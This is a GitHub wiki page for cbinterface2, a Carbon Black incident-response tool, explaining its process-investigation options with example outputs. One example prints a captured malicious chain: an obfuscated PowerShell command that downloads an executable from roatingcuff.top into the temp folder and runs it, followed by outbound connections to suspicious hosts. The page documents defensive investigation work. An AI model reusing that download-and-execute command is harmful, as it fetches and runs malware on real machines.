ProcessInvestigation - ace-ecosystem/cbinterface2 GitHub Wiki

Process Investigation / Process Event Inspection

Use the process inspection interface to carve and parse process events. You can use any combination of optional arguments together and these arguments are also applied to processes that recursively walked with the -w (--walk-tree) option.

NOTE: If you do not supply any optional arguments, the following inspection arguments are applied by default:

-i, --proc-info       show process information
-t, --process-tree    print the process tree with this process as the root.
-a, --process-ancestry
                        print the the process ancestry
-c, --show-children   print process children event details
-nc, --netconns       print network connections
-fm, --filemods       print file modifications
-rm, --regmods        print registry modifications
-ml, --modloads       print modloads
-sl, --scriptloads    print scriptloads (PSC)
-cp, --crossprocs     print crossprocs

All process inspection arguments:

$ cbinterface i -h
usage: cbinterface investigate [-h] [-i] [-w] [-t] [-a] [-c] [-nc]
                                      [-fm] [-rm] [-ml] [-sl] [-cp] [-rpe]
                                      [--json]
                                      process_guid_options

positional arguments:
  process_guid_options  the process GUID/segment to inspect. Segment is
                        optional.

optional arguments:
  -h, --help            show this help message and exit
  -i, --proc-info       show binary and process information
  -w, --walk-tree       Recursively walk, print, and inspect the process tree.
                        Specified arguments (ex. filemods) applied at every
                        process in tree. WARNING: can pull large datasets.
  -t, --process-tree    print the process tree with this process as the root.
  -a, --process-ancestry
                        print the the process ancestry
  -c, --show-children   only print process children event details
  -nc, --netconns       print network connections
  -fm, --filemods       print file modifications
  -rm, --regmods        print registry modifications
  -ml, --modloads       print modloads
  -sl, --scriptloads    print scriptloads (PSC)
  -cp, --crossprocs     print crossprocs
  -rpe, --raw-print-events
                        do not format Cb events onto a single line. Print them
                        the way Cb does by default.
  --json                Combine all results into json document and print the
                        result.

CB Response Process Segments

The Carbon Black Response product breaks process events up into process "segments".

Single Segment Specification

You can specify that a single process segment is inspected by passing a process with the process.current_segment set to an existing process. This can be accomplished on the command line by passing the segment with the process GUID, like so:

cbinterface inspect 00006a99-0000-59ac-01d6-feff3879acfd/1612887600302

All Segment Specification (default)

By default, if a single segment is not specified (current_segment field not set in the Process object) all segment events are inspected.

Process Investigation Examples

I used PSC for all of these examples but the commands are all interoperable.

Get process info

cbinterface i 7W2FQEEY-02361dc7-000009d4-00000000-1d70b8a6f55bfa7 -i

Print process ancestry and the process tree

$ cbinterface i 7W2FQEEY-02361dc7-000009d4-00000000-1d70b8a6f55bfa7 -a -t

------ Process Ancestry ------

  2021-02-25 10:25:23.200000-0500: "C:\Windows\System32\WScript.exe" "C:\Users\NeoLite6\Downloads\RenamedBadNess\RenamedBadNess.js"  | 7W2FQEEY-02361dc7-000009d4-00000000-1d70b8a6f55bfa7
    2021-02-23 08:47:52.351000-0500: C:\Windows\Explorer.EXE | 7W2FQEEY-02361dc7-00000fd0-00000000-1d709ea7b218d27
      2021-02-23 08:47:52.228000-0500: C:\Windows\system32\userinit.exe | 7W2FQEEY-02361dc7-00001368-00000000-1d709ea7b0ec532
        2021-02-23 08:47:16.322000-0500: winlogon.exe | 7W2FQEEY-02361dc7-000002dc-00000000-1d709ea65a7ff1d


------ Process Execution Tree ------

    "C:\Windows\System32\WScript.exe" "C:\Users\NeoLite6\Downloads\RenamedBadNess\RenamedBadNess.js"   | 7W2FQEEY-02361dc7-000009d4-00000000-1d70b8a6f55bfa7
      "C:\Windows\System32\cmd.exe" /c pOwEr^shEll -ex^ecution^pol^icy b^ypa^ss -n^oprof^ile -w h^idd^en $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://roatingcuff.top/leo3881/main.php','%temp%sDT76.exe'); & %temp%sDT76.exe & lKBAwPHfChLgeix  | 7W2FQEEY-02361dc7-00000a20-00000000-1d70b8a6f8788d9
        pOwErshEll  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://roatingcuff.top/leo3881/main.php','C:\Users\NeoLite6\AppData\Local\TempsDT76.exe');   | 7W2FQEEY-02361dc7-0000219c-00000000-1d70b8a6f996b9c
        C:\Users\NeoLite6\AppData\Local\TempsDT76.exe    | 7W2FQEEY-02361dc7-0000208c-00000000-1d70b8a71e4dff5
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1  | 7W2FQEEY-02361dc7-000004a4-00000000-1d70b8a6f8f5eea

Walk the process tree, printing network connections for every process, and grep for outbound connections

$ cbinterface i 7W2FQEEY-02361dc7-000009d4-00000000-1d70b8a6f55bfa7 -w -nc | grep outbound 
 @2021-02-25 10:25:24.772000-0500: Established outbound TCP from 10.0.2.15:58460 to 104.21.31.165:80 (roatingcuff.top)
 @2021-02-25 10:25:27.616000-0500: Established outbound TCP from 10.0.2.15:58461 to 158.69.7.238:443 (aws.amazon.com)
 @2021-02-25 10:25:29.323000-0500: Established outbound TCP from 10.0.2.15:58467 to 164.90.143.105:80 (hipporest.best)